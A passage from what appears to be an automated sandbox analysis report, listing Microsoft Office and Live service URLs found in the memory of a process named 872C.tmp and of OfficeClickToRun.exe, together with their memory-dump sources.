    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsoned
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392543505.0000000003CEA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393595398.0000000003CEA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393216623.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerlift.acompli.net
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ioseKO
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ioser
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pptcs.officeapps.live.com/pptauto/PowerpointAutomation.svc/rest
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pptservicescast.officeapps.live.com/SpeechHandler.ashxH
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pptservicescast.officeapps.live.com/TextTranslationHandler.ashx
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/FrontDoor.ashx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/PowerpointSuggestion.svc/OutlineToPPT/Trace
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pptsgs.officeapps.live.com/pptsgs/resources/A-41F5A7235243
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pptss.officeapps.live.com/pptss/powerpointsample.svc/PptSample
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C31F9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059765755.00000248C2D40000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055975744.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055272677.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory#
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014678463.00000248C0D50000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057482704.00000248C0D52000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelp
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelpe
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelpem
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelplog
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod.support.office.com/InAppHelptry
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profile.live.com/cid-%s/d-%s/
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profile.live.com/home/homeU$
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41ResourceServiceEndpoint2https://fs.microsof
